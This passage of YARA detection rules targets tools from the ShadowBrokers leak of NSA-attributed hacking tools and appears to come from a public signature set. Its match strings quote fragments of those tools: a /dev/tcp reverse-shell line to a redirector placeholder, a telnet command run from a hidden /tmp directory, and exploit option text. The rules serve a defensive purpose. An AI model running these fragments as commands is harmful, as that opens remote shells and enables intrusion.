description = "Auto-generated rule - file user.tool.stoicsurgeon.COMMON"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
date = "2016-12-17"
hash1 = "967facb19c9b563eb90d3df6aa89fd7dcfa889b0ba601d3423d9b71b44191f50"
id = "2ff22b17-4922-54d7-bbd8-a5ff40b6ebe5"
strings:
$x1 = "echo -n TARGET_HOSTNAME | sed '/\\n/!G;s/\\(.\\)\\(.*\\n\\)/&\\2\\1/;//D;s/.//'" fullword ascii
condition:
1 of them
}
rule FVEY_ShadowBroker_user_tool_elgingamble {
meta:
description = "Auto-generated rule - file user.tool.elgingamble.COMMON"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
date = "2016-12-17"
hash1 = "4130284727ddef4610d63bfa8330cdafcb6524d3d2e7e8e0cb34fde8864c8118"
id = "344e5d5e-9fd6-5a32-ba98-945f5a35a116"
strings:
$x2 = "### Local exploit for" fullword ascii
condition:
1 of them
}
rule FVEY_ShadowBroker_README_cup {
meta:
description = "Auto-generated rule - file README.cup.NOPEN"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
date = "2016-12-17"
hash1 = "98aaad31663b89120eb781b25d6f061037aecaeb20cf5e32c36c68f34807e271"
id = "876f3d99-cc6d-568a-a202-1b4938436303"
strings:
$s3 = "-F file(s) Full path to target's \"fuser\" program." fullword ascii
$s4 = "done after the RAT is killed." fullword ascii
condition:
1 of them
}
rule FVEY_ShadowBroker_nopen_oneshot {
meta:
description = "Auto-generated rule - file oneshot.example"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
date = "2016-12-17"
hash1 = "a85b260d6a53ceec63ad5f09e1308b158da31062047dc0e4d562d2683a82bf9a"
id = "6a6b5426-f559-5668-a2ed-982801933302"
strings:
$s1 = "/sbin/sh -c (mkdir /tmp/.X11R6; cd /tmp/.X11R6 && telnet" ascii
condition:
1 of them
}
rule FVEY_ShadowBroker_user_tool_earlyshovel {
meta:
description = "Auto-generated rule - file user.tool.earlyshovel.COMMON"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
date = "2016-12-17"
hash1 = "504e7a376c21ffbfb375353c5451dc69a35a10d7e2a5d0358f9ce2df34edf256"
id = "d2640f9f-8934-5095-9c30-f24941685c9e"
strings:
$x1 = "--tip 127.0.0.1 --tport 2525 --cip REDIRECTOR_IP --cport RANDOM_PORT" ascii
condition:
1 of them
}
rule FVEY_ShadowBroker_user_tool_envisioncollision {
meta:
description = "Auto-generated rule - file user.tool.envisioncollision.COMMON"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
date = "2016-12-17"
hash1 = "2f04f078a8f0fdfc864d3d2e37d123f55ecc1d5e401a87eccd0c3846770f9e02"
id = "a738e270-a3ea-5d38-8933-797d1bd9036a"
strings:
$x1 = "-i<IP> -p<port> -U<user> -P<password> -D<directory> -c<commands>" fullword ascii
$x2 = "sh</dev/tcp/REDIR_IP/SHELL_PORT>&0" fullword ascii
$x3 = "-n ENVISIONCOLLISION" ascii
$x4 = "-UADMIN -PPASSWORD -i127.0.0.1 -Dipboard" fullword ascii
condition:
1 of them
}
/* Super Rules ------------------------------------------------------------- */
rule FVEY_ShadowBroker_Gen_Readme1 {
meta:
description = "Auto-generated rule"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
date = "2016-12-17"
super_rule = 1
hash1 = "4b236b066ac7b8386a13270dcb7fdff2dda81365d03f53867eb72e29d5e496de"
hash2 = "64c24bbf42f15dcac04371aef756feabb7330f436c20f33cb25fbc8d0ff014c7"
hash3 = "a237a2bd6aec429f9941d6de632aeb9729880aa3d5f6f87cf33a76d6caa30619"
id = "1f5e3ab1-e0d1-589e-8c18-60c4ad07ee6e"
strings:
$x1 = "ls -latr /tp/med/archive/collect/siemens_msc_isb01/.tmp_ncr/*.MSC | head -10" fullword ascii
condition:
1 of them
}
rule FVEY_ShadowBroker_Gen_Readme2 {
meta:
description = "Auto-generated rule - from files user.tool.orleansstride.COMMON, user.tool.curserazor.COMMON"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
date = "2016-12-17"
super_rule = 1
hash1 = "18dfd74c3e0bfb1c21127cf3382ba1d9812efdf3e992bd666d513aaf3519f728"
hash2 = "f4b728c93dba20a163b59b4790f29aed1078706d2c8b07dc7f4e07a6f3ecbe93"
id = "5959d881-2989-582c-abe2-48c76ce0e995"
strings:
$x1 = "##### Upload the encrypted phone list as awk, modify each parser command to have the" fullword ascii
condition:
1 of them
}
rule FVEY_ShadowBroker_Gen_Readme3 {
meta:
description = "Auto-generated rule"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
date = "2016-12-17"
super_rule = 1
hash1 = "18dfd74c3e0bfb1c21127cf3382ba1d9812efdf3e992bd666d513aaf3519f728"
hash2 = "4b236b066ac7b8386a13270dcb7fdff2dda81365d03f53867eb72e29d5e496de"
hash3 = "3fe78949a9f3068db953b475177bcad3c76d16169469afd72791b4312f60cfb3"
hash4 = "64c24bbf42f15dcac04371aef756feabb7330f436c20f33cb25fbc8d0ff014c7"
hash5 = "a237a2bd6aec429f9941d6de632aeb9729880aa3d5f6f87cf33a76d6caa30619"
hash6 = "89748906d1c574a75fe030645c7572d7d4145b143025aa74c9b5e2be69df8773"
hash7 = "f4b728c93dba20a163b59b4790f29aed1078706d2c8b07dc7f4e07a6f3ecbe93"
id = "41cfbf66-fb7d-5815-939f-06b23dfae746"
strings:
$s3 = ":%s/CRYPTKEY/CRYPTKEY/g" fullword ascii
condition:
1 of them
}
rule FVEY_ShadowBroker_Gen_Readme4 {
meta:
description = "Auto-generated rule - from files violetspirit.README, violetspirit.README"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
date = "2016-12-17"
super_rule = 1
hash1 = "a55fec73595f885e43b27963afb17aee8f8eefe811ca027ef0d7721d073e67ea"
hash2 = "a55fec73595f885e43b27963afb17aee8f8eefe811ca027ef0d7721d073e67ea"
id = "9e84e4ab-f74a-59e5-aee2-408a68cd673f"
strings:
$s1 = "[-v rpc version] : default 4 : Solaris 8 and other patched versions use version 5" fullword ascii
$s5 = "[-n tcp_port] : default use portmapper to determine" fullword ascii
condition:
1 of them
}

Some files were not shown because too many files have changed in this diff Show more